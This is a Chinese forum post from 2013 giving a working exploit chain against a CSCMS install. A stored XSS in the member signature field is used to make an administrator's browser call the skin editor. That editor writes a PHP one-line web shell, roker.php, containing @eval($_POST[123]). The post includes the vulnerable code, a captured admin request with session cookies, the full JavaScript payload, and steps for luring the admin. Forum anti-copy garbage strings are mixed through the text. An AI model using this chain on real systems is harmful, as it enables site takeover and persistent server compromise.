|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
+ V- p2 {! W6 h3 `6 i: P. l3 w) r官网已经修补了,所以重新下了源码
- `, i. c* W6 w( }1 K因为 后台登入 还需要认证码 所以 注入就没看了。
, [) {7 ~; W" ?+ I" a存在 xss1 o3 I* `0 t+ X
漏洞文件 user/member/skin_edit.php) s% Q5 F. [& i: R% X( ^+ N
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:# ~( @! k$ v1 M5 l( U7 Q( | G! \; g
9 W9 x* l4 y3 X+ d. k6 I7 f- w6 [+ T</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>* v2 t1 X9 a1 `% [! M& r( Y
1 \; G1 o8 K& ?" [</textarea></td></tr>4 ^8 C3 S3 S0 L; u. g$ X% l
1 g% H1 O: ?) c0 g) [
user/do.php - J; G" B1 Z! ]# \& ~% ]3 i) x
' u% ` P3 u8 i; J5 }; W
; Z5 n$ C7 v! ^$ h- N( X/ Y7 oif($op=='zl'){ //资料& D$ q! P2 b% M1 A* A f% r
9 k( p* m1 `3 \3 ` f
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
8 G- Z5 B3 m( T& ` exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));4 D# s3 I& g9 O( P
1 A& a7 Z% q' z" W+ J $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',$ K3 |' t( h# P5 l- o6 a: c+ I
1 L' N/ M1 x: ^ O0 R* s, a
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
. Q4 x, l, P% e& U' f where CS_Name='".$cscms_name."'";2 \. }* D' o% x" j& \1 J
8 R: `1 [! J: ^/ ~
if($db->query($sql)){2 {6 o* y4 N9 T; k8 }5 X5 F/ R
) a/ l7 P4 i7 Y) X1 @! |) Q7 ^3 l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
5 o- B5 Z0 ]3 S$ |% q
2 A# K- v! w; ` }else{
* g+ T/ M, E; L! c/ q, i# w! ] 9 m: T6 D1 x/ n; T @0 p# S
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
$ G: `# q7 }& b! [! i# m
# C/ D0 j# E* R" k$ ?, }# U }8 U+ W* O8 @. d' L* q6 }
( A( {3 c1 M9 ?4 m4 H* o8 c
) k/ l* d) y! t# W! f( [
没有 过滤导致xss产生。
2 }1 ^( R5 t+ u& ` ]9 m& g6 P后台 看了下 很奇葩的是可以写任意格式文件。。
- o% ?! T; |7 r" ]- b, {抓包。。
( p* Z5 }9 {1 W1 E; F' f0 W( [- Z5 C6 `
, S1 v, F, \! L$ v- L+ ]本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.13 Q8 N5 ?, k0 Q. `0 Q0 o
* L. \, Q) o2 c- F u% dAccept: text/html, application/xhtml+xml, */*# B( r. f6 m( h" S8 {
% ~) h% x( H6 L6 v2 cReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php0 U. C% Q4 A/ W$ g0 n2 O) _
8 _! ]4 o/ e0 o& {
Accept-Language: zh-CN
/ |( s* M' v. [0 x' E# ? 3 M! b& A* J- e4 `9 i
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
8 T d: o. ~$ |. y
G. z6 o7 ^6 I% eContent-Type: application/x-www-form-urlencoded
! {9 m$ u' \7 ~! Y
% a: c6 y8 M7 ^0 j i4 q# ZAccept-Encoding: gzip, deflate
. J, S* F# u4 N; a6 \1 u( F
' C6 Y3 U' T8 T- G: F5 IHost: 127.0.0.1
0 ~$ x( R5 |' V1 N) l8 `2 ^; t; a+ y3 m 0 F F2 P' I& I5 T+ r6 j+ O
Content-Length: 38& n- I" k. J! H# U6 O
" j. _2 c' j& C1 L6 p$ gDNT: 1 A. |5 H& b Y9 x/ c Y
" M& B4 K6 L) u9 ~, `Connection: Keep-Alive: k! \2 w; b+ s/ W
! ]3 Q3 [( m$ M! rCache-Control: no-cache
' W+ B5 p q9 D! e; M, {3 {- W & r! Y( o* J0 c# y. r1 n+ h
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
: D |2 \7 i9 \; d( t 9 h$ u' \5 z. d( | X! a# ?' i" k
# g; `( S+ F0 r4 Yname=aaa.php&content=%3Cs%3E%3Ca%25%3E' F2 v6 Z }- P8 ^5 G
8 R" ^! R0 {" n/ d6 z+ l
( ~5 r- Q1 U& T: H
; ~+ p7 w- H# P' B于是 构造js如下。$ U& V" b: T# E4 Y4 q6 {! U- P
7 h4 x% e( x/ Z9 X5 p0 B
本帖隐藏的内容<script>
1 W' [1 a3 L! x5 X; a ^6 I1 C- K0 cthisTHost = top.location.hostname;2 U* C* y z5 X3 a8 y
+ g( q) F! O% V7 A4 W
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
8 n7 V' {) w" s2 [ 4 g/ M" L' ^1 A$ I
function PostSubmit(url, data, msg) {
. D/ T6 ]- B5 D; Q var postUrl = url;5 k1 t4 J: K$ ?( d& G& w( q# _
& S3 X. |0 r/ n* u- u! _ var postData = data;
* e6 E. T2 @/ M E8 R var msgData = msg;
! k( p4 @; ?! S var ExportForm = document.createElement("FORM");
! _6 k W/ l% s. R: a6 E document.body.appendChild(ExportForm); ( h( a5 v" ]0 i4 C" k& F, x
ExportForm.method = "POST"; * Q. ^3 B) H8 J# {
var newElement = document.createElement("input");
5 {& `$ W( a3 j( R newElement.setAttribute("name", "name");
" y% p" w" S, q( V newElement.setAttribute("type", "hidden");
- {$ x) n1 ]* v r" D8 O4 A var newElement2 = document.createElement("input"); 2 T8 j' u1 h$ F2 ?+ U3 L; {
newElement2.setAttribute("name", "content"); - J5 e$ y. r2 m
newElement2.setAttribute("type", "hidden"); . `) I# S8 d9 C# O: @$ E& Q* G
ExportForm.appendChild(newElement); : T. Y2 F* M" s& v2 i% ~
ExportForm.appendChild(newElement2);
+ [% ]+ ~7 p! j! V6 V# j" `# D newElement.value = postData; 6 s& n$ o- C! ]4 L+ n4 d' h& l8 g
newElement2.value = msgData;
2 H/ Z$ U: J0 F7 p9 A ExportForm.action = postUrl; 5 O/ W# b+ `" B% U/ h w
ExportForm.submit();
Y+ p6 |' P; j6 ^; z};
$ b1 D2 T5 a: X$ c) s/ R ' w) A& P8 k1 k
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");1 O2 L. o X# x% J
5 R" { K3 `# i3 D, E e2 w6 h</script>- ]* h) p9 z U5 q' p/ J7 e6 N( x
1 g3 k& d a2 J6 F5 I$ X5 ?4 s! A- Z+ i U3 U5 \ c
+ y7 E/ t; ], d: U
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入/ i2 R, S) K% g$ z6 C
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)) {% Q+ f4 D, X! \' A( Y7 H2 e; I
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
4 v5 Y# @5 Q( T9 R( S& u" v |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对